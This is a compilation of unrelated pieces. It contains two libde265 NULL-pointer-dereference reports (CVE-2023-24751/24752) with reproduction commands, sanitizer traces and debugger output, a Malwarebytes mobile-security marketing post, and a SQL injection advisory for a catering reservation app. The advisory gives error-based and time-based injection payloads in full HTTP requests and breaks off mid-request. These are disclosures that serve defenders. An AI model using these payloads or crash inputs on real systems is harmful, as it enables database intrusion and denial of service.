libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the mc_chroma function at motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.

**Description**

NULL Pointer Dereference in function mc\_chroma at motion.cc:244

**Version**

    git log
    commit 1cf2999583ef8a90e11933ed70908e4e2c2d8872 (HEAD -> master, origin/master, origin/HEAD)
    
    

**Steps to reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    ./autogen.sh
    export CFLAGS="-g -O0 -lpthread -fsanitize=address"
    export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
    export LDFLAGS="-fsanitize=address"
    ./configure --disable-shared
    make -j
    

    cd dec265
    ./dec265 ./poc_segv03.bin
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==7799==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55b3b6a88832 bp 0x7ffcc9fb8d30 sp 0x7ffcc9fb5180 T0)
    ==7799==The signal is caused by a READ memory access.
    ==7799==Hint: address points to the zero page.
        #0 0x55b3b6a88831 in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:244
        #1 0x55b3b6a80067 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:412
        #2 0x55b3b6a80edd in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2141
        #3 0x55b3b6968fb7 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4136
        #4 0x55b3b6971418 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4504
        #5 0x55b3b69752e1 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
        #6 0x55b3b69773db in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
        #7 0x55b3b697a0c2 in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
        #8 0x55b3b6883487 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
        #9 0x55b3b6886ca0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
        #10 0x55b3b6887934 in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
        #11 0x55b3b688d902 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1338
        #12 0x55b3b6852f9d in main /home/fuzz/libde265/dec265/dec265.cc:764
        #13 0x7f184b1ce082 in __libc_start_main ../csu/libc-start.c:308
        #14 0x55b3b68570dd in _start (/home/fuzz/libde265/dec265/dec265+0x240dd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/fuzz/libde265/libde265/motion.cc:244 in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)
    ==7799==ABORTING
    

**POC**

poc\_segv03.bin

**GDB**

    gdb --args ./dec265 ./poc_segv03.bin
    
    ─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    
    Program received signal SIGSEGV, Segmentation fault.
    0x00005555557c2324 in mc_chroma<unsigned char> (ctx=0x621000000100, sps=0x629000005210, mv_x=0, mv_y=2, xP=0, yP=0, out=0x7ffffffe6d60, out_stride=16, ref=0x0, ref_stride=0, nPbWC=8, nPbHC=16, bit_depth_C=8) at motion.cc:244
    244               padbuf[x+extra_left + (y+extra_top)*(MAX_CU_SIZE+16)] = ref[ xA + yA*ref_stride ];
    ─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     0x00005555557c2316  mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6304 and    %edi,%edx
     0x00005555557c2318  mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6306 test   %dl,%dl
     0x00005555557c231a  mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6308 je     0x5555557c2324 <mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318>
     0x00005555557c231c  mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6310 mov    %rax,%rdi
     0x00005555557c231f  mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6313 callq  0x555555570dd0 <__asan_report_load1@plt>
     0x00005555557c2324  mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318 movzbl (%rcx),%ecx
     0x00005555557c2327  mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6321 lea    -0x1610(%r15),%rdx
     0x00005555557c232e  mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6328 movslq %esi,%rax
     0x00005555557c2331  mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6331 add    %rdx,%rax
     0x00005555557c2334  mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6334 mov    %rax,%rdx
    ─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
         rax 0x0000000000000000        rbx 0x000055555581d4e0     rcx 0x0000000000000000     rdx 0x0000000000000000     rsi 0x0000000000000000     rdi 0x0000000000000000     rbp 0x00007ffffffe29f0     rsp 0x00007ffffffdee60
          r8 0x0000000000000000         r9 0x0000000000000000     r10 0x00007ffffffe2a10     r11 0x00007ffffffe6d60     r12 0x00007ffffffe2a10     r13 0x00000fffffffbde0     r14 0x00007ffffffdef00     r15 0x00007ffffffe29c0
         rip 0x00005555557c2324     eflags [ PF ZF IF RF ]         cs 0x00000033              ss 0x0000002b              ds 0x00000000              es 0x00000000              fs 0x00000000              gs 0x00000000        
    ─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     239          for (int x=-extra_left;x<nPbWC+extra_right;x++) {
     240  
     241            int xA = Clip3(0,wC-1,x + xIntOffsC);
     242            int yA = Clip3(0,hC-1,y + yIntOffsC);
     243  
     244            padbuf[x+extra_left + (y+extra_top)*(MAX_CU_SIZE+16)] = ref[ xA + yA*ref_stride ];
     245          }
     246        }
     247  
     248        src_ptr = &padbuf[extra_left + extra_top*(MAX_CU_SIZE+16)];
    ─── Stack ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [0] from 0x00005555557c2324 in mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318 at motion.cc:244
    [1] from 0x000055555579fcb0 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+11224 at motion.cc:412
    [2] from 0x00005555557b92dd in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+496 at motion.cc:2141
    [3] from 0x0000555555683258 in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int)+2790 at slice.cc:4136
    [4] from 0x0000555555687afa in read_coding_unit(thread_context*, int, int, int, int)+15196 at slice.cc:4504
    [5] from 0x0000555555689d5e in read_coding_quadtree(thread_context*, int, int, int, int)+3873 at slice.cc:4652
    [6] from 0x00005555556729f1 in read_coding_tree_unit(thread_context*)+1351 at slice.cc:2861
    [7] from 0x000055555568aec2 in decode_substream(thread_context*, bool, bool)+4333 at slice.cc:4741
    [8] from 0x000055555568e986 in read_slice_segment_data(thread_context*)+1762 at slice.cc:5054
    [9] from 0x000055555558c18a in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*)+3516 at decctx.cc:852
    [+]
    ─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [1] id 14091 name dec265 from 0x00005555557c2324 in mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+6318 at motion.cc:244
    ─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    arg ctx = 0x621000000100: {<error_queue> = {warnings = {[0] = DE265_WARNING_CTB_OUTSIDE_IMAGE_AREA, […, sps = 0x629000005210: {sps_read = true,video_parameter_set_id = 12 '\f',sps_max_sub_layers = 5 '\…, mv_x = 0, mv_y = 2, xP = 0, yP = 0, out = 0x7ffffffe6d60: 0, out_stride = 16, ref = 0x0: Cannot access memory at address 0x0, ref_stride = 0, nPbWC = 8, nPbHC = 16, bit_depth_C = 8
    loc xA = 0, yA = 0, x = -1, y = -1, padbuf = '\000' <repeats 5359 times>, src_ptr = 0x0: Cannot access memory at address 0x0, src_stride = 0, extra_left = 1, extra_right = 2, extra_bottom = 2, extra_top = 1, __PRETTY_FUNCTION__ = "void mc_chroma(const base_context*, const seq_parameter_set*, int, int, int, int, int16_t*, int, co…, shift3 = 6, wC = 16, hC = 48, xFracC = 0, yFracC = 2, xIntOffsC = 0, yIntOffsC = 0, mcbuffer = {[0] = 0 <repeats 4544 times>}
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    >>> p ref
    $1 = (const unsigned char *) 0x0
    >>> 
    

**Impact**

This vulnerability is capable of crashing software, causing a denial of service via a crafted input file.

CVE-2023-24751: NULL Pointer Dereference in function mc_chroma at motion.cc:244 · Issue #379 · strukturag/libde265

libde265 v1.0.10 was discovered to contain a NULL pointer dereference in the ff_hevc_put_hevc_epel_pixels_8_sse function at sse-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input file.

**Description**

NULL Pointer Dereference in function ff\_hevc\_put\_hevc\_epel\_pixels\_8\_sse at sse-motion.cc:987

**Version**

    git log
    commit 1cf2999583ef8a90e11933ed70908e4e2c2d8872 (HEAD -> master, origin/master, origin/HEAD)
    
    

**Steps to reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    ./autogen.sh
    export CFLAGS="-g -O0 -lpthread -fsanitize=address"
    export CXXFLAGS="-g -O0 -lpthread -fsanitize=address"
    export LDFLAGS="-fsanitize=address"
    ./configure --disable-shared
    make -j
    

    cd dec265
    ./dec265 ./poc_segv02.bin
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==7777==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x561cd0288664 bp 0x000000000008 sp 0x7ffc7e060af0 T0)
    ==7777==The signal is caused by a READ memory access.
    ==7777==Hint: address points to the zero page.
        #0 0x561cd0288663 in _mm_loadl_epi64(long long __vector(2) const*) /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
        #1 0x561cd0288663 in ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*) /home/fuzz/libde265/libde265/x86/sse-motion.cc:987
        #2 0x561cd032c6ab in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const ../libde265/acceleration.h:296
        #3 0x561cd032c6ab in void mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:205
        #4 0x561cd0323067 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /home/fuzz/libde265/libde265/motion.cc:412
        #5 0x561cd0323edd in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /home/fuzz/libde265/libde265/motion.cc:2141
        #6 0x561cd020f601 in read_coding_unit(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4314
        #7 0x561cd02182e1 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4652
        #8 0x561cd02188b6 in read_coding_quadtree(thread_context*, int, int, int, int) /home/fuzz/libde265/libde265/slice.cc:4638
        #9 0x561cd021a3db in decode_substream(thread_context*, bool, bool) /home/fuzz/libde265/libde265/slice.cc:4741
        #10 0x561cd021d0c2 in read_slice_segment_data(thread_context*) /home/fuzz/libde265/libde265/slice.cc:5054
        #11 0x561cd0126487 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:852
        #12 0x561cd0129ca0 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /home/fuzz/libde265/libde265/decctx.cc:954
        #13 0x561cd012a934 in decoder_context::decode_some(bool*) /home/fuzz/libde265/libde265/decctx.cc:739
        #14 0x561cd012e1c7 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /home/fuzz/libde265/libde265/decctx.cc:697
        #15 0x561cd012f62c in decoder_context::decode_NAL(NAL_unit*) /home/fuzz/libde265/libde265/decctx.cc:1239
        #16 0x561cd0130df5 in decoder_context::decode(int*) /home/fuzz/libde265/libde265/decctx.cc:1327
        #17 0x561cd00f5f9d in main /home/fuzz/libde265/dec265/dec265.cc:764
        #18 0x7f8428229082 in __libc_start_main ../csu/libc-start.c:308
        #19 0x561cd00fa0dd in _start (/home/fuzz/libde265/dec265/dec265+0x240dd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709 in _mm_loadl_epi64(long long __vector(2) const*)
    ==7777==ABORTING
    

**POC**

poc\_segv02.bin

**GDB**

    gdb --args ./dec265 ./poc_segv02.bin
    
    ─── Output/messages ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    
    Program received signal SIGSEGV, Segmentation fault.
    _mm_loadl_epi64(long long __vector(2) const*) (__P=<optimized out>) at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
    709       return _mm_set_epi64 ((__m64)0LL, *(__m64_u *)__P);
    ─── Assembly ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     0x0000555555706650  _mm_loadl_epi64(long long __vector(2) const*)+84  setle  %r10b
     0x0000555555706654  _mm_loadl_epi64(long long __vector(2) const*)+88  test   %dil,%dil
     0x0000555555706657  _mm_loadl_epi64(long long __vector(2) const*)+91  setne  %r11b
     0x000055555570665b  _mm_loadl_epi64(long long __vector(2) const*)+95  test   %r11b,%r10b
     0x000055555570665e  _mm_loadl_epi64(long long __vector(2) const*)+98  jne    0x55555570713a <ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*)+4010>
     0x0000555555706664  _mm_loadl_epi64(long long __vector(2) const*)+104 movq   0x0(%rbp),%xmm7
     0x0000555555706669  _mm_loadl_epi64(long long __vector(2) const*)+109 mov    %r12,%r9
     0x000055555570666c  _mm_loadl_epi64(long long __vector(2) const*)+112 shr    $0x3,%r9
     0x0000555555706670  _mm_loadl_epi64(long long __vector(2) const*)+116 cmpw   $0x0,0x7fff8000(%r9)
     0x0000555555706679  _mm_loadl_epi64(long long __vector(2) const*)+125 punpcklbw %xmm6,%xmm7
    ─── Breakpoints ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Expressions ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── History ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Memory ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    ─── Registers ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
         rax 0x0000000000000001        rbx 0x0000000000000000     rcx 0xffffffffffffffe0     rdx 0x00005555557f0fc0     rsi 0x0000000000000000     rdi 0x0000000000000000     rbp 0x0000000000000008     rsp 0x00007ffffffde7f0
          r8 0x0000000000000008         r9 0x0000000000000001     r10 0x0000000000000001     r11 0x0000000000000000     r12 0x00007ffffffe66a0     r13 0x0000000000000000     r14 0x0000000000000008     r15 0x00000aaaaaafe2a1
         rip 0x0000555555706664     eflags [ PF ZF IF RF ]         cs 0x00000033              ss 0x0000002b              ds 0x00000000              es 0x00000000              fs 0x00000000              gs 0x00000000        
    ─── Source ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     704  }
     705  
     706  extern __inline __m128i __attribute__((__gnu_inline__, __always_inline__, __artificial__))
     707  _mm_loadl_epi64 (__m128i_u const *__P)
     708  {
     709    return _mm_set_epi64 ((__m64)0LL, *(__m64_u *)__P);
     710  }
     711  
     712  extern __inline __m128i __attribute__((__gnu_inline__, __always_inline__, __artificial__))
     713  _mm_loadu_si64 (void const *__P)
    ─── Stack ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────���────────────────────────────────────────────────────────────────────
    [0] from 0x0000555555706664 in _mm_loadl_epi64(long long __vector(2) const*)+104 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
    [1] from 0x0000555555706664 in ff_hevc_put_hevc_epel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, int, int, short*)+1236 at sse-motion.cc:987
    [2] from 0x00005555557aa6ac in acceleration_functions::put_hevc_epel(short*, long, void const*, long, int, int, int, int, short*, int) const+182 at ../libde265/acceleration.h:296
    [3] from 0x00005555557aa6ac in mc_chroma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int)+7260 at motion.cc:205
    [4] from 0x00005555557a1068 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*)+26328 at ../libde265/image.h:301
    [5] from 0x00005555557a1ede in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int)+446 at motion.cc:2141
    [6] from 0x000055555568d602 in read_coding_unit(thread_context*, int, int, int, int)+8402 at slice.cc:4314
    [7] from 0x00005555556962e2 in read_coding_quadtree(thread_context*, int, int, int, int)+2834 at slice.cc:4652
    [8] from 0x00005555556968b7 in read_coding_quadtree(thread_context*, int, int, int, int)+4327 at slice.cc:4638
    [9] from 0x0000555555697b83 in read_coding_tree_unit(thread_context*)+1587 at slice.cc:2861
    [+]
    ─── Threads ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    [1] id 7781 name dec265 from 0x0000555555706664 in _mm_loadl_epi64(long long __vector(2) const*)+104 at /usr/lib/gcc/x86_64-linux-gnu/9/include/emmintrin.h:709
    ─── Variables ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    arg __P = <optimized out>
    loc x = 0, y = 0, x1 = <optimized out>, x2 = <optimized out>, src = 0x8 <error: Cannot access memory at address 0x8>: Cannot access memory at address 0x8…
    ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    >>> 
    

**Impact**

This vulnerability is capable of crashing software, causing a denial of service via a crafted input file.

CVE-2023-24752: NULL Pointer Dereference in function ff_hevc_put_hevc_epel_pixels_8_sse at sse-motion.cc:987 · Issue #378 · strukturag/libde265

Categories: Business
Protect your organization from mobile phishing and malware attacks.



(Read more...)




The post Crushing the two biggest threats to mobile endpoint security in 2023 appeared first on Malwarebytes Labs.

Don’t let their small size fool you: mobile devices can have a big impact on your security posture. It’s easy to see why, considering that almost **half of organizations** said they suffered a mobile-related compromise in 2022.

Malware and phishing are two particular mobile threats that you need to defend against in 2023. Just check out the following stats from last year:

*   **18 percent of clicked phishing emails** in 2022 came from a mobile device. (Verizon Mobile Security Index 2022)
*   **46 percent organizations** that had suffered a mobile-related security breach in 2022 said that **app threats were a contributing factor**. (Verizon Mobile Security Index 2022)
*   9 percent of organizations suffered a **mobile malware attack** in 2022. (Check Point 2023 Cyber Security Report)

In addition, according to Malwarebytes research, 45 percent of schools reported that at least one cybersecurity incident last year started with Chromebooks or other mobile devices.

In this post, we’ll talk about the threat that phishing and malware pose to mobile endpoint security and how to crush them.

**Mobile devices have a huge target on their backs**

Mobile devices are a key part of today’s modern business: 56 percent of employees rely on at least four to eight enterprise applications on their mobile device.

But wherever sensitive data exists, threat actors are out there trying to get their hands on it.

The explosion of bring-your-devices (BYOD) policies during and after the pandemic created a large, new attack surface. **Employees love mobile devices for their convenient access to corporate data systems; attackers love them for the same reason**.

**Malware on Android**

First things first, malware is a much bigger threat to Android devices than it is to iOS devices, as iOS malware is extremely rare.

Malware on mobile Android devices comes in many forms, including adware, ransomware, trojan-banker (aka ‘bankers’), and trojan-dropper (aka ‘droppers’). Droppers, considered the “most Trojan of Trojans,” disguise themselves as innocent apps to steal personal and financial data. Droppers can install copies of themselves, and because they can drop software that downloads other malware, they can be used to establish a permanent gateway into a smartphone, and then into a business

In our 2022 State of Malware Report, Malwarebytes found that droppers accounted for 14 percent of detections on Android. Other malware is more widespread, but **droppers pose the greatest danger to organizations**.

_Examples of recent Android malware_

**Phishing on iOS and Android**

Phishing has always worked wonders for attackers, and if it ain’t broke, don’t fix it—including on mobile devices. In fact, Zimperium found the number of phishing sites that target mobile devices specifically has seen 50 percent growth from 2019-2021.

Phishing attacks on Android and iOS range from email to banking, SMS (smishing), and even attempting to trick users into handing over legitimate two-factor authentication codes.

Targeted phishing campaigns on enterprise mobile devices are common, with threat attackers often impersonating companies such as Apple, PayPal, and Amazon.

**Mobile Device Management (MDM) ain’t the solution**

A common misconception that we hear when we talk about mobile endpoint security is that MDM is the solution to all of our mobile malware and phishing woes.

It’s not.

Mobile device management services only secure use of corporate data, but are not designed to counter threats such as malware and phishing on iOS and Android devices.

Organizations should look beyond MDM platforms and toward mobile security products that use a variety of techniques, including behavioral analysis, to crush mobile threats. Some features of a robust mobile threat defense product include:

*   24/7 real-time protection against emerging threats
*   Advanced antivirus, anti-malware, anti-spyware capabilities
*   Malicious app protection
*   App privacy audit
*   Safe web browsing
*   Block ads and ad trackers
*   Filters suspicious fraudulent texts
*   Spam call blocking

**Malwarebytes makes mobile device security easy**

With Malwarebytes Mobile Security for Business, you can put a damper on mobile attacks on your organization in just a few clicks.

In Nebula, our cloud-hosted security platform made for small to large businesses (OneView for MSPs), all you have to do to get started is activate the endpoint agent for your mobile devices.

From there, you set how your mobile endpoints behave by adding a new policy and selecting **Web protection and Ad block** for iOS and **Behavior protection** for ChromeOS and Android.

Once you save this policy, you’re set**!**

Admins gain immediate visibility into mobile device activity, enabling IT teams to easily identify and report malicious threats, PUPs, and PUMs.

The Malwarebytes Mobile Security app on IOS (left) and Android (right)

The statistics don't lie—phishing and malware pose a big threat to mobile endpoint security in 2023. But with a mobile threat defense solution like Malwarebytes Mobile Security, you can crush threats like these and more. Get a free trial and/or quote below!

**Get a quote or free trial of Malwarebytes Mobile Security**

Crushing the two biggest threats to mobile endpoint security in 2023

A vulnerability classified as critical has been found in SourceCodester Online Catering Reservation System 1.0. This affects an unknown part of the file /reservation/add_message.php of the component POST Parameter Handler. The manipulation of the argument fullname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222003.

Permalink

Cannot retrieve contributors at this time

**Online Catering Reservation System v1.0 has SQL injection**

BUG\_Author:jackswordsz

Source website address:https://www.sourcecodester.com/php/11355/online-catering-reservation.html

Vulnerability File: /reservation/add\_message.php

POST parameter 'fullname' exists SQL injection vulnerability

Payload1:fullname=1'&email=2%40gmail.com&subject=3&message=4

    POST /reservation/add_message.php HTTP/1.1
    Host: localhost
    Content-Length: 51
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/reservation/contact.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=02qotonqdgu64aj0uljkiarmul
    Connection: close
    
    fullname=1'&email=2%40gmail.com&subject=3&message=4
    

An error occurred in the sql statement

Payload2:fullname=1' and (select 1 from (select(sleep(20)))b) and 'a'='a&email=2%40gmail.com&subject=3&message=4

    POST /reservation/add_message.php HTTP/1.1
    Host: localhost
    Content-Length: 103
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
